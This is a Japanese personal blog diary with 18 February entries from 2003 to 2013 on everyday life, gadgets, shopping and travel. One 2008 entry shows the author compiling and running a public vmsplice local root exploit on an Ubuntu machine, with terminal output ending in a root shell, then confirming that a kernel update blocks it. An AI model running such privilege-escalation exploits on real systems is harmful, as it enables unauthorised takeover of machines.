トップ «前の日(02-17) 最新 次の日(02-19)» 追記

muneda's diary


2003-02-18 今日は外に出る(予定) → 出た

_1 ドリル

の音で強制起床させられる.とはいえ,既に1100近かったですが*1.多分引っ越しの入退室に伴う工事なんだけど,ボロアパートだけに響き過ぎ.

*1 なんかイベントがないと起きられないな.あかん

_2 GROW

kdmsnrさんとこより

shockwave.com AWARD2002 のゲーム部門および一般投票賞獲得作品.シンプルなんだけど,次どうなるの?っていうワクワク感ありなところがいい.中身的にはこれがあったらこうなるみたな確率的の問題なんだけどそんなこと考えずに適当にポイポイってやる方がおもしろい.これもセンスだな.

_3 週間スタートレック

ゲットズサ―――――――――――――.家の近くの大きな本屋の系列店で平積みされてた.おまけで特製の黒いビニール袋に入れてもらった.

店員のおばちゃんに定期購読どう?って聞かれた.デアゴスティーニシリーズを買うととりあえず聞かれるのかな.丁重に断っといたけど.


2004-02-18 快晴

_1 サッカーW杯予選

仕事があるので帰れず.みてぇよ〜

追記 : y!の速報を見つつ仕事.数字的にはつまんねぇ.むしろボロ勝ちしないといけなかったんじゃないのかこの試合.でも実際に見てるとおもしろかったんじゃないかな?やっぱ見たかった.

_3 Linux Conference 2004

つい先日開催されたと思っていたらもう今年の分か.今年は東京なのでひょっとしたら行けるかも.

Tags: Linux

2005-02-18 雨,冷え込みはマシか

_1 あびる優

何かようわからんけどすごいことになってるな.

一番最初にこのネタを見たのは探偵ファイルだった気がする.その後新聞サイトで番組の内容が不適切だ,などの記事を見かけてから一気に広がったように思った.がんがんレギュラー番組もほされてるようやし終わりかねぇ.今週のアッコにおまかせはちょっと見てみたいかも.

_2 高岡のチャンポンはちょっと違うぞ (デイリーポータルZ)

gentooさんとこより

このうどん屋が改装される前には何度か行ったことがあるけど,こんなんあったかな?覚えてないわ.次回帰った時には試してみるか.

ちなみに

高岡ではこれがチャンポンってわけではないみたいです。駅員さんも力強く否定してました。

オレも力強く否定しておく.

_3 Re: Canon EOS 350D DIGITAL

正式にキスデジの後継種として日本で発表された.

ということで昨日あげた候補から初代キスデジは削除.あとはキスデジNかD70かだな.ちなみにAmazonではまだ予約が開始されていない.

_4 DeCSS防止技術を発表 (ITmedia)

/.-jより

おいおい,オレのお昼の楽しみを取るなよ.最近はTNGを英語音声,英語字幕で見るのが楽しくて仕方ないのに.実際いつ頃製品に乗ってくるのか,CCCDで失敗している業界がどう反応してくるのかに注目.でもCSSとCCCDとでは大違いか.


2006-02-18 寒くもなくヌクくもなく

_1 Re: append.css

div.lwwsの左側にオレンジのラインを表示できなかった問題の原因判明.原因はファイルのパス名指定を間違えていたこと.

よってappend.cssでは画像ファイルのurlに

theme/theme名/画像ファイル名

を指定することでちゃんと表示されるようになった.

ついでにTrackBackがうまく動かなかったのを修正.パーミッションの実行権が落ちてた.Re:のリンク先へTrackBack送信.

Tags: TDiary

2007-02-18 雨のち曇り,冷え冷え

_1 タブブラウザ使えない

起動時に前回終了時の状態を復元する

にチェックを入れた状態,かつ,ブラウザが起動していない状態で,他のアプリからURLを指定してブラウザを起動すると,前回終了時の状態(つまり開きっぱなしのタブね)が全部削除され,クリックしたURLのタブだけが開かれる.ホント使えねぇな.同じ事やったのこれで2回目.

ブラウザがすでに起動しているときは新しいタブとして開かれるから何の問題もないのに.このブラウザやっぱり捨てかな.

_2 ピタゴラ装置 DVDブック2(佐藤雅彦/内野真澄)

ふとamazonのページを見たら予約受付してたのでポチっとな.

そういえば,クレジットカードの有効期限を更新したら,配送予定の商品が勝手に発送延期された.やっともうそろそろ納期だったのに月末以降に持ち越し.(-公-;)ショボン

Tags: DVD Buy

_3 罪悪感

以前も書いたが,休みの日の花子はみんな一緒じゃないと寝たがらない.

今日もまたヨメはんと二人寝室に向かったあとオレを捜しに戻ってきた.でも構っているといつまでも寝ないので物陰に隠れる.すると見つけられずにしょんぼりと戻っていった.

あああ,なんかすげぇ罪悪感.しまった,どうして隠れちゃったんやろうか.凹.いてもたってもいられなくなって寝室まで追いかけていってしばらく添い寝.

なんかいい方法ないかなぁ.

Tags: Life
本日のツッコミ(全2件) [ツッコミを入れる]

_ こ〜りん [ありますね > 前回終了時の状態の削除 私は、同一サイトで複数アカウント併用する都合もあって、 標準のブラウザ: S..]

_ muneda [うちの場合メモリが少ないので,2つ開くなんてことはできません. ブラウザが起動していれば再現しないのでしばらくはコレ..]


2008-02-18 晴れ,寒く感じるのは風邪だからか

_1 発熱

病み上がりだしということで早めに帰ってきて,念のためと体温を測ったところ38.3℃.えええ,がっつり風邪引いとるやん orz

ということで晩は体が温まるよう雑炊を食べる.

Tags: Health

_2 スラッシュドット・ジャパン|書き込み型光学メディアのベストな保存方法は?

以下が参考になるかな.

バックアップは複数あるに越したことはない.Google(PicasaWeb)にプライベートモードで置いておく?Prieaはダメダメなので使わないけど.Mozyも使うかなぁ.とりあえず手元のデータで重要なのは写真.

_3 スラッシュドット・ジャパン|Linuxカーネル2.6系にroot権限を奪われる脆弱性が発見される

ちょっと前のネタ.

手元でもやってみた.

mux06% uname -a
Linux mux06 2.6.22-14-generic #1 SMP Fri Feb 1 04:59:50 UTC 2008 i686 GNU/Linux
mux06% gcc vmsplice_local_root_exploit.c -o vmsplice_local_root_exploit
mux06% ./vmsplice_local_root_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40177000 .. 0x401a9000
[+] root
root@mux06:~# whoami
root

Ubuntuで簡単にrootになる方法,って違うな.で,カーネルのアップデートが出ていたので当てる.

mux06% uname -a
Linux mux06 2.6.22-14-generic #1 SMP Tue Feb 12 07:42:25 UTC 2008 i686 GNU/Linux
mux06% gcc vmsplice_local_root_exploit.c -o vmsplice_local_root_exploit
mux06% ./vmsplice_local_root_exploit
-----------------------------------
Linux vmsplice Local Root Exploit
By qaaz
-----------------------------------
[+] mmap: 0x0 .. 0x1000
[+] page: 0x0
[+] page: 0x20
[+] mmap: 0x4000 .. 0x5000
[+] page: 0x4000
[+] page: 0x4020
[+] mmap: 0x1000 .. 0x2000
[+] page: 0x1000
[+] mmap: 0x40177000 .. 0x401a9000
[-] vmsplice: Bad address

OK.

Tags: Kernel Linux

2009-02-18 曇り

_1 早寝

昨日amazonから発送したよメールがきたので今日には荷物が届くかなと思っていたが,帰宅しても届いていなかったので早々に不貞寝.

Tags: Life

2010-02-18 曇り

_1 IRC

こっちに来てから使い始めたのだが,普段は単なる連絡用.ちょっと一言質問したいときにわざわざ相手のキューブに歩いて行っていかなくても済むように.

で昨日初めてちゃんとした仕事で使用(1つは時間帯は同じだがオフィスが違う,1つは時間帯もオフィスも違う).メールだと見なかったふりして自分の作業を優先できるが,わざわざ呼び出されて入ったIRCは即時性が高い.まあかなり急ぎの用事だったようなので今回はいいけど,頻繁にやられると結構キツいかな.

Tags: Life

_2 【正規品】 MOTOROLA Bluetooth ワイヤレスステレオヘッドセット MOT-S9HDBK

I藤さんからテスト用に借用.(なので厳密にはBuyカテゴリじゃないんだが,まあいいか)

いつも電話会議ではSkypeを使っているんだが,先日有線ヘッドセットのマイクだけ断線して使えなくなった.

代わりの有線ヘッドセットを買おうとしたのだが,こちらはピンク・黄緑のケーブルがそれぞれ1本ずつ出ているタイプが少ない.2.5mmまたは3.5mmのケーブルが1本出ているタイプが多い.2.5mm/3.5mmからピンク・黄緑への変換アダプタも売っているがこれだけで$10くらいするとかあり得ん.

ということでBluetoothにしてみようかなと思ったところに,I藤さんが耳に合わなかったので使ってないのがあるんだが,とすばらしいコメントをくれたので借りてテストしてみた.

まずはiMacとペアリングしてみたが,Bluetooth設定アシスタントに従って設定したところオーディオデバイスとしか認識してくれない.次にVistaでToshiba Bluetooth Stackを使って自動で設定したところこちらもオーディオデバイスとしか認識してくれない.つまりマイクが使えない.

ググってみたところ,ドンぴしゃのタイミングで書かれた2chのコメントを発見.以下に引用.

Motorola S9-HDがBluetoothアダプタ上で、「サービスクラス:オーディオシンク」として認識されているのが原因

手動(カスタムモード)でMotorola S9-HDの接続を「サービスクラス:ハンズフリー」として追加する。

とあったので試してみた.「VoIP連携しますか」などというダイアログが出てきたのでこれは期待できそうと思ったが,手元の環境ではマイク・スピーカーともにNG.

ところが試しにハンズフリーではなく「ヘッドセット」としたところちゃんと聞こえる!Vistaとの接続時に通話応答ボタンを押すよう強要されるが,それくらい問題なし.

で肝心の通話品質だが,スピーカーは問題ないがマイクがイマイチ.マイクがスピーカーの付け根にあり,口から離れているため音が拾いにくいという構造上の問題だと思われる.ちょっと大きめの声で話せば大丈夫だと思うけど,外で携帯電話のヘッドセットとして使う場合微妙かも.

S9-HDが使えるのはわかったが,本命マシンはXPのノート.ただしこちらはBluetoothのアダプタ(ドングル)が搭載されておらず買わないといけない.Amazonで調べてみたが安いのはスタック(ドライバ)が腐ってるとのことで酷評が多い.どうすべきか.

それにしてもUS/JP間の価格差がすごい.この円高の時代にも関わらず $67.45/¥14,770 と日本は2倍以上.普及率の差かなあ.


Motorola MotoROKR S9-HD Bluetooth Stereo Headset

Motorola
$66.96

Tags: Buy

2011-02-18 晴れ

_1 会議予備日

今シーズン雪が多かったのと,昨年の会議は初日雪が大変で開始が遅れたのとで,今回は予備日を設けていたんだが,幸いにも問題なく当初のスケジュール通り進んだので,今日は何も無い日.

出張者をホテルまで迎えに行き,他のメンバーも集まってうろうろグダグダと.最後に出張者を空港近くのホテルまで送って行っておしまい.

Tags: Life

2012-02-18 晴れ

_1 Presidents' Day Sale

去年はNorthShore Mallでイマイチな思いをしてたようで,初心に戻りWRENTHAM VILLAGE PREMIUM OUTLETSへ.

相変わらずのSale時のCoachの列を横目に服屋をメインにあれこれ覗いて回る.やっぱり春物が多いな.去年の売れ残りをシーズン前に売ってるのかな.子どもたちには春夏ものをちょろっと.Columbiaが冬物の投げ売ってたのであれこれまとめ買い.ふだんがんばっているヨメはんにダウンとジャケットを,次郎に来年用スノーブーツを,オレはフードパーカーを2枚とフリースジャケットを.多分定価だと$600強を$170くらいで購入.脅威の値下げ率で満足満足.

残念なことに今年花子のスノーパンツと次郎のスノージャケット・パンツを購入したSpyderの店が20120222を持ってこのアウトレットから撤退するとのこと.モノ的には良くて帰任前に子どもたちのを買い換えようと思っていたのに残念.定価だとちょっと手が出ないし.うーむ.

帰りはいつものごとく反対車線にプチ渋滞が出来てましたとさ.

Tags: Buy

_2 給油 CR-V

これまた給油メモが漏れてる.多分前回から2週間か3週間ぶりだと思う.

730 Cochituate Rd. Framingham, MA 01701のCumberland Farmsで.

走行距離297.5 mile
給油量12.5 gallon
実燃費23.8 mpg
燃費計23.9 mpg
総走行距離16,050 mile

明日はちょっと眺めに走るので早めに給油.Framingham, Natickあたりで給油するなら多分ここが一番安いかな.なので,結構給油ポンプがあるにもかかわらず混んでた.前に信号待ちしてた車5台中4台がここに入って行ったくらいだし.

ガソリン代は$3.559/gallon.最近週2回くらいのペースで小刻みに値上げてしているので,少しくらい早めに給油するのがいいのかも知れん.

Tags: Car Fuel

2013-02-18 曇り,ヌクい

_1 一時帰国 Day1

今回搭乗したのは777-200ERでシートレイアウト的にW32

787(E01)と比較してエコノミーが100席以上多いのでガラガラ.うちも乗る前に3人がけシートを4人で2つ確保してもらえたし,かなりの割合で3人がけシートを一人で使って寝てる人が多かった.

もうフライトも終盤というところになって急に花子が体調を崩す.地上にいる間は大丈夫そうなのが幸いだが心配.

飛行機は約100分遅れで着陸.着陸後ゲート到着まで止まってたりして結局降りられたのは約120分遅れ.ヨメはんと一時別れて荷物受け取り班とその他回収班とで別行動.その間JALの地上スタッフにあれこれ相談したところ,そばについてくれることになったんだが結局なんの役にも立たなかった.羽田のANAにも連絡しておくとの事だったが,引き継がれていないようだったし.

ヨメはんと合流しバスに乗って羽田へ.2000発の便に対して1915分くらいに空港到着だったので予定していた夕食は食べられず,すぐさま搭乗手続きしてセキュリティを抜けてゲート到着搭乗と忙しかった.フライトも短いのでゆっくりと出来ずなんだかなあ.

富山からはバスに乗って最寄り駅まで移動しタクシーに乗って実家へ.到着後子どもたちは即寝.こちらもひと通り片付けて大人も即寝.

長い一日お疲れ様でした.

Tags: Travel

_2 機内映画

国際線は映画でも見て暇つぶしと目論んでいたが,今回面白いのがあまりなかったのが残念.見たのは以下のとおり.

  • グッモーエビアン!
  • 綱引いちゃった
  • アポロ13

最初二つは主題がどこにあるのかようわからんかった.

アポロ13は字幕版がなかったのが残念.途中のセリフ英語だったらどう言ってるんだろうかと確認するのが面倒だった.英語音声で聞けってことなんだろうけど,専門用語が多くてついていけないしなあ.

Tags: DVD

過去の日記
2002|05|06|07|08|09|10|11|12|
2003|01|02|03|04|05|06|07|08|09|10|11|12|
2004|01|02|03|04|05|06|07|08|09|10|11|12|
2005|01|02|03|04|05|06|07|08|09|10|11|12|
2006|01|02|03|04|05|06|07|08|09|10|11|12|
2007|01|02|03|04|05|06|07|08|09|10|11|12|
2008|01|02|03|04|05|06|07|08|09|10|11|12|
2009|01|02|03|04|05|06|07|08|09|10|11|12|
2010|01|02|03|04|05|06|07|08|09|10|11|12|
2011|01|02|03|04|05|06|07|08|09|10|11|12|
2012|01|02|03|04|05|06|07|08|09|10|11|12|
2013|01|02|03|04|05|06|07|08|09|10|11|12|
2014|01|02|03|04|05|06|07|08|09|10|11|12|
2015|01|02|03|05|06|
トップ «前の日(02-17) 最新 次の日(02-19)» 追記